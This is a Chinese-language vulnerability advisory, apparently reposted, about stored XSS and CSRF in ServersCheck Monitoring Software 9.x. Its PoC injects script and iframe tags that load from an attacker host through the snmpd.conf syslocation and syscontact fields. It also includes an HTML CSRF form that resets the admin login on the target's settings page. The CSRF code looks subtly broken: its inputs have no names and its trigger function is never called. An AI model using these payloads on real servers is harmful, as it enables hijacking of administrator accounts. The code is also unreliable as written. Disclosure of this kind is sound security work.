ServersCheck Monitoring Software脚本插入漏洞

发布日期:2012-10-12
更新日期:2012-10-16

受影响系统:
ServersCheck Monitoring Software ServersCheck Monitoring Software 9.x
描述:
--------------------------------------------------------------------------------
ServersCheck Monitoring Software是网络监控和服务器监控软件。

ServersCheck Monitoring Software存在安全漏洞,通过"syslocation" 、"syscontact"参数传递的输入没有正确过滤即显示给用户,可被利用插入任意HTML和脚本代码。

<*来源:loneferret
 
  链接:
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# PoC:
# Store XSS & Cross Site Request Forgery
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
# JavaScript file.
# ..
# syslocation <script src="https://attacker/xss.js"></script>
# syscontact <iframe src="https://attacker/scheck-csrf.html"></iframe>

# CSRF PoC:
# We can also use the previous XSS to trigger this. Makes for a funny.
# Change Admin credentials
# File scheck-csrf.html
<html>
<body>
<script>
        function trigger() {
                document.getElementById('bad_form').submit();
        }
</script>
<form method="post" action="http://target:1272/settings2.html">
  <input value="secure" type="hidden">
  <input value="SECURE" type="hidden">
  <input value="ok" type="hidden">
  <input value="SECURE" type="hidden">
  <input size="30" value="loneferret" type="hidden"><br>
  <input size="30" value="123456" type="hidden"><br>
</form>
</body>
</html>

建议:
--------------------------------------------------------------------------------
厂商补丁:

ServersCheck Monitoring Software
--------------------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyfsxz.html